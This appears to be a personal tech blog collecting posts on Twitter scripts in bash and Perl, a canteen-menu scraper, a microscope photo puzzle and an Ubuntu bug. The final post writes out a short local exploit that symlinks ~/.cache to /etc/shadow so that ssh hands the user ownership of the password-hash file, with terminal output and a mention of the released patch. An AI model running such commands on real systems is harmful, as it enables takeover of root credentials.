binfalse

Just found it on F.A.T., a Firefox plugin called google-alarm! Look at this tool and recognize how much information you expose by simple surfing.

To make it work on my Iceweasel 3.5.11 I had to change the em:minVersion in the install.rdf of the .xpi archive. It’s just for noticing, I don’t provide this changed version because you should not download such things from sites like mine ;)

You should also take a look at F.A.T., they often have smart projects!

When I signed in this morning Micha greets me with his status of eliminating the first pot of coffee. Very interesting… So we decided to start twittering ;)

I already registered an account about ten months ago, just to see how it works, but now I’ll try to show some activity and tweet a lot of boring things..

First of all I developed a little script that tweets my messaged via curl:

#!/bin/bash

user=USER
msg=$*
if [ "${#msg}" -gt 140 ]
then
    echo "msg too long: ${#msg}"
    exit 1
fi

curl --basic -u $user -d status="$msg" https://twitter.com/statuses/update.xml >> /dev/null

Just call it with your message, it will ask for a passphrase to your account.. Just download it and use it like ./tweet.sh yeah it works .

And of course I’ve written a script that dumps all news to my console. To parse the XML I’m using Perl:

#!/usr/bin/perl -w
use warnings;
use strict;
use LWP::UserAgent;
use XML::TreeBuilder;
use XML::Entities;
use POSIX;
binmode STDOUT, ":utf8";

my $max = 10;
$max = $ARGV[0] if ($ARGV[0] && isdigit ($ARGV[0]));

my $browser = LWP::UserAgent->new;
$browser->credentials('twitter.com:443', 'Twitter API', 'USER' => 'PASSWORD' );
my $response = $browser->get('https://twitter.com/statuses/friends_timeline.xml');
die "failed...\\n" . $response->status_line if (!$response->is_success);
my $tree = XML::TreeBuilder->new();
$tree->parse($response->decoded_content);

my $anz = 1;
foreach my $status ($tree->find_by_tag_name ('status'))
{
	my $time = XML::Entities::decode ('all', $status->find_by_tag_name ('created_at')->as_text);
	my $text = XML::Entities::decode ('all', $status->find_by_tag_name ('text')->as_text);
	my $user = XML::Entities::decode ('all', $status->find_by_tag_name ('user')->find_by_tag_name ('screen_name')->as_text);
	print "$text\\n\\tby $user at $time\\n\\n";
	last if (++$anz > $max);
}

A little bit more code, but easy to use! Just download and run it with ./twitstat.pl [MAX_NUMBER_OF_TWEETS] . (You may need some additional Perl libs)

So let’s see how long I keep going on.. You can follow me at http://twitter.com/binfalse

I often check what our canteen offer for lunch before we leave our building. The website that presents this portfolio is one of the worst I’ve ever seen and meanwhile I noticed that my private walking Mensa planer has still some bugs, so I had to think about an alternative solution and developed a little Perl script…

My initial idea was to read the website, parse the XML code and print the meals. Not a bit of it! The code of this site is nothing like valid! They invent new tags I’ve never heard about, they close nowhere opened paragraphs or table cells, I do not find the html-closing tag (the document ends with closing it’s body) and so on… It’s to much to mention all it’s unique features, but let me blame the producer: Peinhardt IT Systeme. Seems to be professionals… (A notice has left my mailbox, looking forward to their answer)

How ever, XML parsing fails, solving the bugs also fails, to much of it… So I’m now just grabbing the HTML-code, to extract the interesting content, with a more or less ugly regex, and print them to console… Here is the code:

#!/usr/bin/perl -w

use warnings;
use strict;
use LWP::UserAgent;

binmode STDOUT, ":utf8";

my $url = "http://meine-mensa.de/speiseplan_iframe";
my $mensa = 5;

my $browser = LWP::UserAgent->new(parse_head => 0);
$browser->timeout(10);

my $response = $browser->post ($url, ["selected_locations[]" => $mensa]);
my $content = $response->decoded_content ();
$content =~ s/\n//g;

while ($content =~ /<span style="font-weight: normal; font-size: 12px" class="counter_name">(.+?)<\/span>.+?<span.+?>(.+?)<\//gi)
{
	print $1.":\t".$2."\n";
}

So if somebody is also joining the Mensa Weinberg, you can copy this code or download it. The other canteens are also available, just change the value of the variable $mensa to your preferred one. The numbers can be found in the source code of this stupid website. Ok, to save you from trouble here are the numbers:

Cafeteria Brandbergweg

11

Cafeteria Burg

12

Mensa Bernburg

8

Mensa Dessau

13

Mensa Franckesche Stiftungen

14

Mensa Harz

3

Mensa Köthen

7

Mensa Neuwerk

9

Mensa Tulpe

10

Mensa Weinberg

5

Well, that’s it! Now you can decide within seconds whether it’s worthy to go to lunch or better stay hungry ;)

On Tuesday I went to Penny to buy some usual stuff. This week they also offered digital microscopes. One was left, so I had to purchase!

I did not expect any great hardware, but I’m astonished! First because it works on my sidux without any driver or manual work, just had to connect it to my USB port! And secondly I did not thought that 200 times magnification is such a high zoom rate..

How ever, I already had a lot of fun with it and prepared a puzzle. Here are some zoomed images and you can try to guess where it came from. Suggestions can be posted via comment, those of you who found a right solutions are invited to drink a beer with me ;)

Zoom A

An easy one to start…

Solution: Wood guessed by Martin S.

Zoom B

You use it nearly every day, don’t you!?

Solution: Backside of a German Euro coin guessed by Martin S.

Zoom C

Girls have to know it :P

Solution: Paper Towels guessed by Michael Rennecke

Zoom D

Maybe you’ll find it in your office…

Solution: Ball pen guessed by Martin S.

Zoom E

Not mine, but nevertheless very nice ;)

Solution: Watch guessed by Martin S.

(Unfortunately it’s Maria’s, I don’t have a real image of it yet… Comming soon)

Zoom F

If you can directly tell me where it comes from I’m impressed!

Solution: Novell animal guessed by Maria

Zoom G

Nice and old one! We use it to decrease the noise.

Solution: Mousepad guessed by Martin S.

Zoom H

Teachers may know it.

Solution: Whiteboard marker guessed by Michael Rennecke and Christoph R.

Zoom I

It’s a small zoom rate and very easy, but it looks nice.

Solution: DVI-Connector guessed by Michael Rennecke

Zoom J

Done with a tool from previous image.

Solution: Painted Whiteboard guessed by Michael Rennecke

(Unfortunately with a hint…)

Zoom K

It’s a mini computer.

Solution: Chipcard chip guessed by Martin S.

Zoom L

I don’t really like it, maybe I’m the only one who doesn’t…

Solution: Sugar guessed by Christoph R.

Zoom M

Also easy I think..

Solution: Screw guessed by Norman

Zoom N

Office stuff.

Solution: Ammo for stapler gun guessed by Martin S.

Zoom O

From the refrigerator.

Solution: Sausage guessed by Steffi

Zoom P

You are using it at the moment! Thanks to Rumpel!

Solution: (Mona Lisa) Harddrive guessed by Michael Rennecke

Zoom Q

At least one of it is actually running in every bigger machine.

Solution: Fan guessed by Michael Rennecke

Zoom R

Ok, thats difficult, I’m wondering if anyone can find the right answer. I’ve already blogged about it…

Solution: Look through a SUN-Ray guessed by Michael Rennecke

Zoom S

Small zoom and simple to guess.

Solution: Crinkled cardboard guessed by Martin S.

Zoom T

Also for teachers.

Solution: Chalk guessed by Martin S.

Zoom U

Sportsmen know such things.

Solution: Rumpel’s scab ;) guessed by Martin S.

Zoom V

You’ll find one in nearly every office.

Solution: Pencil guessed by Christoph R.

Zoom W

Also not mine ;)

Solution: Shaved beard guessed by Michael Rennecke

Zoom X

Mmmh, disgusting, isn’t it?

Solution: Kiwi guessed by Maria and Norman

Zoom Y

Also disgusting I think.

Solution: Dried Strawberry guessed by Maria

Zoom Z

Germans should know it!

Solution: Print media guessed by Martin S.

(Wow, c’t identified! It’s written on the CD)

Zoom 1

Oh nice colors.

Solution: Display guessed by Martin S.

Zoom 2

Something like a kaleidoscope?

Solution: Condensed water guessed by Michael Rennecke

Zoom 3

Mmh, that is tasty, ask your doc!

Solution: Apple stem guessed by Maria

Zoom 4

Yes, that is mine!

Solution: Unshaved beard guessed by Michael Rennecke

Tomorrow I’ll provide some more images, but not for puzzling because to some of the images I don’t have a right solution or I don’t know an exact name. So be patient ;)

Update: As promised the album.

Microscoping

Ubuntu, you all should know, isn’t my preferred operating system. It’s very nice for linux beginners and may decrease some manual work at private machines, but when I’ve heard about the actual bug I’m very confused why we still have to use Ubuntu in our PC pools and why some work groups are emphatic about this system and why we have to administrate their server and local machines with Ubuntu.

I’m still wondering why simple users in Ubuntu systems can out of the box read all log files or the shadow.. That is not that kind of security I’m dreaming about ;)

The actual bug is very simple (via):

rm -rf ~/.cache
ln -s /etc/shadow ~/.cache
ssh localhost

Now you’ve owned the shadow file and you are able to modify roots pass phrase! It’s just too easy…

By the way I tried it by myself and got a funny message:

mscharm@SERVER ~ % ssh localhost
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@    WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!     @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that the RSA host key has just been changed.
The fingerprint for the RSA key sent by the remote host is
aa:bb:cc:dd:ee:ff:gg:hh:ii:jj:kk:ll:mm:nn:oo:pp.
Please contact your system administrator.
Add correct host key in /homes/mscharm/.ssh/known_hosts to get rid of this message.
Offending key in /homes/mscharm/.ssh/known_hosts:10
RSA host key for localhost has changed and you have requested strict checking.
Host key verification failed.
255 mscharm@SERVER ~ %

And my friend Rumpel also tried this exploit and after lunch I just heard him saying

fuck, bolted out, by my self...

not able to disable his screensaver. Maybe he changed a little bit to much in his shadow file!? ;)

Fortunately the patch is released, so have a lot of fun while updating your systems. You should reboot after the update, otherwise the bug is still enabled…